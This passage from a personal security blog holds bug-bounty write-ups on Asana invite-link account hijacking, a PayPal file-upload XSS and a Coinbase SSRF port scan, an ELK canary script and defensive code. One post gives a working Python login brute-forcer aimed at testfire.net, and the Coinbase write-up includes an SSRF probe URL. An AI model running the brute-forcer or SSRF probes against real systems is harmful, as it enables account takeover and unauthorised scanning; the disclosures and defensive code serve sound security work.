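to the Apache host, then wait until that access-log line shows up in Elasticsearch.
Added example, not code from the original post. Assumptions: Logstash writes to the
default logstash-YYYY.MM.DD indices, ES listens on 9200, and the host addresses used
in __main__ are placeholders."""
import json
import secrets
import time
import urllib.error
import urllib.request


def make_marker():
    """Unique, URL-safe token so the canary cannot be confused with real traffic."""
    return "elk-canary-" + secrets.token_hex(8)


def canary_url(apache_base, marker):
    """Request a path that does not exist: a 404 is still written to the access log."""
    return apache_base.rstrip("/") + "/" + marker


def es_search_body(marker):
    """Phrase query so the hyphenated marker is matched whole, not token by token."""
    return {"query": {"query_string": {"query": '"%s"' % marker}}, "size": 1}


def marker_found(search_response, marker):
    """True when any hit's _source contains the marker (request, message, ...)."""
    hits = search_response.get("hits", {}).get("hits", [])
    return any(marker in json.dumps(hit.get("_source", {})) for hit in hits)


def _post_json(url, body):
    req = urllib.request.Request(
        url, data=json.dumps(body).encode(), headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def check_pipeline(apache_base, es_base, attempts=12, delay=5.0):
    """Fire the canary, then poll ES. Returns the marker on success, None on timeout."""
    marker = make_marker()
    try:
        urllib.request.urlopen(canary_url(apache_base, marker), timeout=10).read()
    except urllib.error.HTTPError:
        pass  # 404 is expected; Apache has already logged the request
    search_url = es_base.rstrip("/") + "/logstash-*/_search"
    for _ in range(attempts):
        if marker_found(_post_json(search_url, es_search_body(marker)), marker):
            return marker
        time.sleep(delay)  # forwarder -> Logstash -> ES index refresh takes a few seconds
    return None


if __name__ == "__main__":
    # Placeholders for IP[EC2_A] (Apache) and IP[EC2_B] (Elasticsearch).
    result = check_pipeline("http://IP_EC2_A/", "http://IP_EC2_B:9200")
    print("pipeline OK, indexed marker " + result if result else "marker never arrived")
```

<div class="MsoNormal"><span style="font-family: "verdana" , sans-serif;">Run it from any machine that can reach both hosts. If the marker never arrives, check the forwarder's output first (connection errors towards EC2_B show up there) and then Logstash's; if it arrives but your dashboard shows nothing, the problem is in Kibana's index or time-range settings rather than in the pipeline.</span></div>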
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br />
<span style="font-family: "verdana" , sans-serif;">The dashboard I use is my personal favourite; it can be found <a href="https://gist.github.com/rshk/23ff4b0c162ba4b8a326">here</a>.</span><br />
<span style="font-family: "verdana" , sans-serif;">I hope this blog entry helps you get a working ELK installation up. Do write a comment below if you get stuck anywhere.</span><br />
<br /></div>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-9276138961898324602013-10-09T12:12:00.000-07:002014-10-21T22:46:47.027-07:00Hijack User accounts via cached Invite links! #Asana #bugbounty<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;">A few weeks back a friend of mine told me about Asana's
bug bounty program. Although I did not see any mention of reward money on their
security page, I still thought of giving it a try. After reading a little about the company I found that <a href="http://www.asana.com/">www.asana.com</a> is a portal where a team can
share resources and organize its work, i.e. a kind of project
management software. </span></span></span><br />
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;">I created an account, started poking around and checked for obvious
vulnerabilities such as XSS and CSRF. The application appeared to be decent, but there
is always some scope for a few logical vulnerabilities.</span></span></span></div>
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;">The application allowed creating new projects and then adding users to them by sending invite links. </span></span></span><br />
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;">The invite links looked like this (<span style="color: #1f8dd6;">https://app.asana.com/app/asana/-/register?invite=</span>XXXXXX),
so I thought of trying my luck with them. </span></span></span><br />
</div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8jIzKb9iVjJ2NgL8tqv4DGdbaiYd3qNK2R2Yal_ubp63YHzAdSFHbm0UIepaFPG5tVg-Bl1rqEsxGrkOgOBqmB7sZBmqiWmKIcLRrRnd-LGEuMy8otKSPdjpFUxwC5jdKIb8kG8zjUw/s1600/adduser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8jIzKb9iVjJ2NgL8tqv4DGdbaiYd3qNK2R2Yal_ubp63YHzAdSFHbm0UIepaFPG5tVg-Bl1rqEsxGrkOgOBqmB7sZBmqiWmKIcLRrRnd-LGEuMy8otKSPdjpFUxwC5jdKIb8kG8zjUw/s320/adduser.png" height="171" width="320" /></a></div>
<br />
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;">Using a few Google dorks I was able to get a list of invite links
that Google had cached, and to my surprise they were still active. </span></span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLl7JBvVLclFOdskG0ROvyEBTm7Bgoz3VvrsweJpc1urBHaOXsEaXm91zEyjow11iv-8AYxkvnlMhluizQjqItTD_IbobhizwdKajiA59crAUaGAGDLvVsyGWdkd6s-jk_W2sAzuXReGg/s1600/Dork-output.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLl7JBvVLclFOdskG0ROvyEBTm7Bgoz3VvrsweJpc1urBHaOXsEaXm91zEyjow11iv-8AYxkvnlMhluizQjqItTD_IbobhizwdKajiA59crAUaGAGDLvVsyGWdkd6s-jk_W2sAzuXReGg/s320/Dork-output.png" height="180" width="320" /></a></div>
<br />
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;">So I collected
a list of cached invite links and tried creating an account, and voila, it worked
as smoothly as I expected. I was able to log into a valid user account by creating a new password. In effect the invite token was the only credential the registration page checked: any link that leaked, here through Google's cache, handed the invited user's account to whoever found it. </span></span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;"></span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXvp0WC2-U9Idqw6C2NRxgWT9hj_qilFS3qgoNX45nGWxgrf988iv14MEalBBqu7Ow4gI1MrKVkCicGKLDUZiLU2_e1ACoied16tIbsAD6vou6HKAWe-KexVMIOf5nb4-_Npecgpq7kyM/s1600/RandomUser1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXvp0WC2-U9Idqw6C2NRxgWT9hj_qilFS3qgoNX45nGWxgrf988iv14MEalBBqu7Ow4gI1MrKVkCicGKLDUZiLU2_e1ACoied16tIbsAD6vou6HKAWe-KexVMIOf5nb4-_Npecgpq7kyM/s320/RandomUser1.png" height="180" width="320" /></a></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/muDW2OVVFdE?feature=player_embedded' frameborder='0'></iframe></div>
</div>
<div class="MsoBodyText">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span lang="EN-GB">I reported this issue to the Asana security team and they were very quick to respond to my emails. The issue got fixed in no time
and they rewarded me for it.</span></span></span></div>
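<div class="MsoBodyText"><span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">What made the cached links dangerous is that the invite token alone was enough to register. The code below is an added example, not Asana's code, of an invite flow built so that a leaked link is useless: tokens are random, stored only as a hash, bound to the invited address, single-use and time-limited, and the registration page is served with headers that tell crawlers and caches not to keep it. The store is in memory, and all names, the one-week lifetime and the header set are hypothetical choices for the example.</span></span></div>

```python
"""Invite-link issuance and redemption hardened against the failure described above.
Added example, not Asana's code: the store is in memory and every name in it is
hypothetical. A token is random, persisted only as a hash, bound to the invited
address, single-use and time-limited, so a link that leaks (a crawler cache, a
forwarded mail, a Referer header) is worthless to anyone but the invitee, and only
until it has been used once."""
import hashlib
import secrets
import time

INVITE_TTL = 7 * 24 * 3600  # assumption: invites expire after one week


class InviteStore:
    def __init__(self, now=time.time):
        self._now = now        # injectable clock so expiry can be tested
        self._invites = {}     # sha256(token) -> invite record

    @staticmethod
    def _hash(token):
        # Only the hash is persisted: a leaked database dump yields no usable links.
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, project_id, invitee_email):
        """Create an invite and return the token to embed in ?invite=..."""
        token = secrets.token_urlsafe(32)  # 256 random bits: not guessable or enumerable
        self._invites[self._hash(token)] = {
            "project": project_id,
            "email": invitee_email.strip().lower(),
            "expires": self._now() + INVITE_TTL,
            "used": False,
        }
        return token

    def redeem(self, token, claimed_email):
        """Return (project_id, "ok") or (None, reason). Each failure is a separate check."""
        rec = self._invites.get(self._hash(token))
        if rec is None:
            return None, "unknown invite"
        if rec["used"]:
            return None, "invite already used"      # a replayed link stops here
        if self._now() > rec["expires"]:
            return None, "invite expired"           # a stale cached link stops here
        if rec["email"] != claimed_email.strip().lower():
            return None, "invite issued to a different address"
        rec["used"] = True                          # burn it before granting access
        return rec["project"], "ok"


def invite_page_headers():
    """Headers for the register?invite=... response so crawlers and caches drop it
    and the token does not leak through Referer to third-party resources."""
    return {
        "Cache-Control": "no-store",
        "X-Robots-Tag": "noindex, nofollow",
        "Referrer-Policy": "no-referrer",
    }
```

<div class="MsoBodyText"><span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">The address binding only helps when the address the user registers with is the one the link was mailed to; a form that lets the redeemer type any address defeats it. Tokens carried in a query string also end up in proxy logs and browser history, so a short lifetime and single use matter even with the caching headers in place.</span></span></div>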
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-9962812550439091012013-10-01T10:57:00.004-07:002014-10-21T23:09:22.541-07:00My lazy attempt towards python! #BeautifulSoup #Requests<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background: white; color: black; font-family: "Verdana","sans-serif"; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-fareast-font-family: "Times New Roman";">Inspired by the amazing <a href="http://null.co.in/"><span style="color: #5b627f;">null</span></a> humla
session that I attended, I thought of writing my own simple login brute-forcer in
Python using Requests. There are plenty of brute-forcing scripts out there,
but I wanted to write my own.</span><br />
<div class="MsoNormal" style="background: white; line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="color: black; font-family: "Verdana","sans-serif"; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-fareast-font-family: "Times New Roman";">I love the <a href="http://docs.python-requests.org/en/latest/"><span style="color: #5b627f;">Requests</span></a> library
for Python; as its author says, it is "HTTP for Humans", and it really is.
I encourage anyone who wants to start learning web scraping in Python
to try this library at least once.</span></div>
<div class="MsoNormal" style="background: white; line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="color: black; font-family: "Verdana","sans-serif"; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-fareast-font-family: "Times New Roman";">I have also used the <a href="http://www.crummy.com/software/BeautifulSoup/"><span style="color: #5b627f;">BeautifulSoup </span></a>library
to extract a few HTML tags. The target is <a href="http://www.testfire.net/">http://www.testfire.net</a>,
a deliberately vulnerable banking application developed by IBM for web application testing.</span></div>
<div class="MsoNormal" style="background: white; line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="color: black; font-family: "Verdana","sans-serif"; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-fareast-font-family: "Times New Roman";">The script tries every password from a wordlist
against the single user name "admin". I initially
tried writing it with cookiejar, but somehow the code got a little lengthy; then Requests came to my rescue.</span></div>
<div class="MsoNormal" style="background: white; line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="color: black; font-family: "Verdana","sans-serif"; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-fareast-font-family: "Times New Roman";">The script reads a file called
'password.txt' containing a list of candidate passwords. In this
case the correct password is "admin". With<span style="background: white;"> the Requests library it is easy to send every request through an intercepting proxy before it
hits the server; here I am running a proxy on port 8082 just to see what
my script is sending. Feel free to use the script
(for learning purposes only); here is the gist <a href="https://gist.github.com/prajal/6782604" target="_blank">link</a>.</span></span><br />
<br /></div>
<div class="MsoNormal" style="background: white; line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; mso-outline-level: 4;">
<pre style="color: #464646; font-family: "Courier New"; font-size: 8.5pt;">#Author: Prajal Kulkarni
# Python 3
import sys
import requests
from bs4 import BeautifulSoup as BS

# Send every request through a local intercepting proxy (e.g. Burp on 8082)
# so the POST data can be inspected before it reaches the server.
proxyDict = {"http": "http://127.0.0.1:8082"}

url = "http://www.testfire.net/bank/login.aspx"

def connect(url, m):
    # Submit one login attempt with the form fields in m.
    t = requests.post(url, data=m, proxies=proxyDict)
    soup = BS(t.text, "html.parser")
    # After a successful login the header link with this id reads "MY ACCOUNT".
    a = soup.find("a", id="_ctl0__ctl0_Content_AccountLink")
    x = str(a.string) if a is not None else ""
    print(x)
    if x == "MY ACCOUNT":
        print("The pass is " + m["passw"])
        sys.exit()
    else:
        print("Password %s not working" % m["passw"])

def controller():
    # One candidate password per line in password.txt, each tried against "admin".
    with open("password.txt", "r") as f:
        passwords = [line.strip() for line in f if line.strip()]
    for line in passwords:
        m = {"uid": "admin", "passw": line, "btnSubmit": "Login"}
        print(m)
        connect(url, m)

controller()</pre></div>
<div class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 13.5pt; mso-margin-top-alt: auto;">
<br /></div>
<div class="MsoNormal" style="background: white; line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<br /></div>
<div class="MsoNormal">
<br /></div>
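A detection-side counterpart to the script above, added here as an example and not part of the original post or the linked gist: it parses access-log lines (constructed for the example, not captured from any real server) and flags any client that submits the login form at least a threshold number of times inside a sliding time window. The log format, the login path and the threshold and window values are assumptions.

```python
# Added example (not from the original post): flag a login brute-force attempt
# like the one the script above performs, from web server access logs.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined-format access log: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log (not from any real server): one client submitting
# the login form six times in ten seconds, one ordinary user logging in once.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Sep/2013:10:00:01 +0000] "POST /bank/login.aspx HTTP/1.1" 200 5123
203.0.113.7 - - [25/Sep/2013:10:00:02 +0000] "POST /bank/login.aspx HTTP/1.1" 200 5123
198.51.100.4 - - [25/Sep/2013:10:00:03 +0000] "GET /bank/login.aspx HTTP/1.1" 200 4870
203.0.113.7 - - [25/Sep/2013:10:00:04 +0000] "POST /bank/login.aspx HTTP/1.1" 200 5123
203.0.113.7 - - [25/Sep/2013:10:00:05 +0000] "POST /bank/login.aspx HTTP/1.1" 200 5123
198.51.100.4 - - [25/Sep/2013:10:00:06 +0000] "POST /bank/login.aspx HTTP/1.1" 302 0
203.0.113.7 - - [25/Sep/2013:10:00:08 +0000] "POST /bank/login.aspx HTTP/1.1" 200 5123
203.0.113.7 - - [25/Sep/2013:10:00:10 +0000] "POST /bank/login.aspx HTTP/1.1" 200 5123
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_login_bruteforce(log_text, path="/bank/login.aspx", threshold=5,
                            window=timedelta(seconds=60)):
    """Return {ip: peak_attempts} for every client that POSTed to `path` at
    least `threshold` times inside any span of length `window`.

    Status codes are deliberately not used as the signal: the script above has
    to parse the page to tell success from failure, so the rate of form
    submissions is what is counted. Lines are assumed to be in time order,
    as a server writes them.
    """
    recent = defaultdict(deque)   # ip -> timestamps of POSTs still inside the window
    peak = defaultdict(int)       # ip -> largest number of POSTs seen in one window
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["method"] != "POST" or rec["path"] != path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:
            q.popleft()
        peak[rec["ip"]] = max(peak[rec["ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}


if __name__ == "__main__":
    print(detect_login_bruteforce(SAMPLE_LOG))   # {'203.0.113.7': 6}
```

On the sample above only 203.0.113.7 is flagged; the ordinary user's single POST stays below the threshold. In practice the same counter keyed by user name catches a distributed attempt against one account, which a per-IP counter alone misses.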
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-77677355177732282172013-09-25T02:54:00.005-07:002014-10-21T23:10:25.257-07:00Arbitrary File Upload in Paypal's http://apps.paypal.com<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<span style="font-family: Verdana, sans-serif;"><span style="orphans: 2; text-align: -webkit-auto; widows: 2;">This was one of many vulnerabilities that I had found in </span>http://apps.paypal.com as part of their bug bounty program.<span style="orphans: 2; text-align: -webkit-auto; widows: 2;"> This is one of their developer portals, hosted on Apache/2.2.22 and running Drupal 7. I reported this issue to Paypal on May 19 2013. </span></span><br />
<div style="orphans: 2; text-align: -webkit-auto; widows: 2;">
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><b>Here are some of the details of the bug:</b></span></div>
</div>
<div style="orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: Verdana, sans-serif;">After logging into the portal, we can create applications for the developer environment, and as part of this the portal allowed uploading supporting files (ad hoc files required for mobile app submissions). I uploaded a simple "txt" file and it generated an external link to the file (https://apps.paypal.com/system/files/test_###.txt).</span></div>
</div>
<div style="font-family: Tahoma; orphans: 2; text-align: -webkit-auto; widows: 2;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQsdDiEvJ7Gu1dg3hao-iq-dQr9l38lST8whxfVXA7U1oh1c1-r87SJHABQ16nI-EQEjtUkFo4RH8RgmXtx0IiklUJwxa4oSEO3l1fM1imiy8P0cEICNAjGCdkKfhYZbalH5Oqn4xo3VU/s1600/Test_txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQsdDiEvJ7Gu1dg3hao-iq-dQr9l38lST8whxfVXA7U1oh1c1-r87SJHABQ16nI-EQEjtUkFo4RH8RgmXtx0IiklUJwxa4oSEO3l1fM1imiy8P0cEICNAjGCdkKfhYZbalH5Oqn4xo3VU/s320/Test_txt.png" height="89" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="orphans: 2; text-align: -webkit-auto; widows: 2;">
<div>
<div style="text-align: -webkit-auto;">
<span style="font-family: Verdana, sans-serif;">The upload allowed all types of extensions (*.jpg, *.txt, *.gzip, *.php, *.jar, *.exe etc.) and didn't validate them on the server end. I tried uploading a simple PHP shell but sadly it didn't work :(.</span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: -webkit-auto;">
<span style="font-family: Verdana, sans-serif;">I tried the "<b>XSS via SWF upload</b>" technique blogged by Soroush Dalili (see <a href="http://soroush.secproject.com/blog/2012/11/xss-by-uploadingincluding-a-swf-file/" target="_blank">here</a> for more details). I uploaded the "xssproject.swf" file and got an external link (https://apps.paypal.com/system/files/xssproject.swf).</span></div>
</div>
<div style="font-family: Tahoma;">
<br /></div>
<div style="font-family: Tahoma;">
<br /></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitY5Fus3X1A07SXlB1JefPpBiCRwXk2Yzfh_RiUWxTpux9aYrYKt02M1uyW7WZXYwgffGL4vlxgJFPMZBTIAzsisSsvXCgvY9M33I6ygGSgZCoGHTPQR4dxA5bt_AwTIvKRxTjrvqeXmY/s1600/xssproject.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitY5Fus3X1A07SXlB1JefPpBiCRwXk2Yzfh_RiUWxTpux9aYrYKt02M1uyW7WZXYwgffGL4vlxgJFPMZBTIAzsisSsvXCgvY9M33I6ygGSgZCoGHTPQR4dxA5bt_AwTIvKRxTjrvqeXmY/s320/xssproject.png" height="221" width="320" /></a></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxHqiR8h2qc4GHYsEmjS8fjvi9l_Si8bsj1Er8-50UM-4ru7IvE5qY4vod6PwGyT4Qu-effywU_zE6r8TAivykMI45ZiScTvPj-6Q-RxdmhnX3T3KJ4AQK6s8hBTLoYwVL7oE8TYBtgfQ/s1600/XSS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxHqiR8h2qc4GHYsEmjS8fjvi9l_Si8bsj1Er8-50UM-4ru7IvE5qY4vod6PwGyT4Qu-effywU_zE6r8TAivykMI45ZiScTvPj-6Q-RxdmhnX3T3KJ4AQK6s8hBTLoYwVL7oE8TYBtgfQ/s320/XSS.png" height="180" width="320" /></a></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">The vulnerability was fixed immediately after it was reported to the security team.</span></div>
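The server-side checks that would have stopped an upload like the one above, written as an added example rather than anything from the original post or from the portal's own code. <code>validate_upload</code>, <code>safe_stored_name</code> and <code>download_headers</code> are hypothetical names; the extension allowlist and the size limit are assumptions. The decision rests on the uploaded bytes, not on the name the client chose, and Flash content is refused whatever it is called.

```python
# Added example (not from the original post): server-side handling for a file
# upload feature of the kind described above. Function names are hypothetical.
import os
import secrets

# Allowlisted extensions and the magic bytes their content must start with.
# ".txt" has no signature, so its content is checked to be printable text.
ALLOWED_TYPES = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".txt": [],
}

# Content that must never be served from the site's origin whatever the file
# is called: Flash (uncompressed, zlib-compressed and LZMA-compressed SWF).
DENIED_SIGNATURES = [b"FWS", b"CWS", b"ZWS"]

MAX_BYTES = 5 * 1024 * 1024   # assumed limit for the example


def is_text(data):
    """True if `data` decodes as UTF-8 and contains only printable characters."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def validate_upload(filename, data):
    """Return (accepted, reason). The client-supplied name is used only for its
    extension; the decision is made on the bytes actually uploaded."""
    if len(data) > MAX_BYTES:
        return False, "too large"
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed"
    head = data[:16]
    if any(head.startswith(sig) for sig in DENIED_SIGNATURES):
        return False, "active content"
    if ext == ".txt":
        if not is_text(data):
            return False, "not text"
    elif not any(head.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    return True, "ok"


def safe_stored_name(filename):
    """Random on-disk name that keeps only the (validated) extension, so the
    client controls neither the path nor the name the file is served under."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return secrets.token_hex(16) + ext


def download_headers(stored_name):
    """Headers for serving a stored upload: force a download and disable MIME
    sniffing, so a file that slipped through is still not rendered in-origin."""
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": 'attachment; filename="%s"' % stored_name,
        "X-Content-Type-Options": "nosniff",
    }
```

Serving uploads from a separate origin (a dedicated files domain) is the stronger fix, because then even a file rendered inline cannot read the main site's cookies or DOM; the headers above are the fallback when the files must stay on the same host.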
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">Happy hunting!! cheers!!</span></div>
<div>
<br /></div>
</div>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com1tag:blogger.com,1999:blog-1982130572676896150.post-42850616368019103662013-06-04T01:40:00.002-07:002014-10-21T23:11:03.830-07:00SSRF/XSPA Bug in https://www.coinbase.com<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">This was one of the bugs which I had reported to Coinbase.com on May 1 2013 as part of their bug bounty program. Although I started quite late in hunting, I was lucky enough to find one interesting vulnerability in their "Merchant_settings" portal. </span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">The vulnerability is an <a href="http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf" target="_blank">SSRF</a>/<a href="http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-1.html" target="_blank">XSPA</a> which allows an attacker to use the application as a proxy to scan for services on remote servers on the internet. In layman's terms, this vulnerability can be abused to port scan other servers on the internet. </span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">Here is the POC that I had submitted to Coinbase. I used "scanme.nmap.org", which is known to have ports 22 and 80 open.</span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">In their "merchant_settings" page there was a field where a merchant can enter a URL for receiving instant payment notifications. The server fetched that URL and displayed whatever the remote server sent back, without validating the response on the server end, so this functionality allowed things like banner grabbing, port scanning, identifying web application frameworks, etc.</span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">Here is an example of an open port (22) on "scanme.nmap.org", which fetched me the OpenSSH version.</span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">#http://scanme.nmap.org:22/index.html</span></span></div>
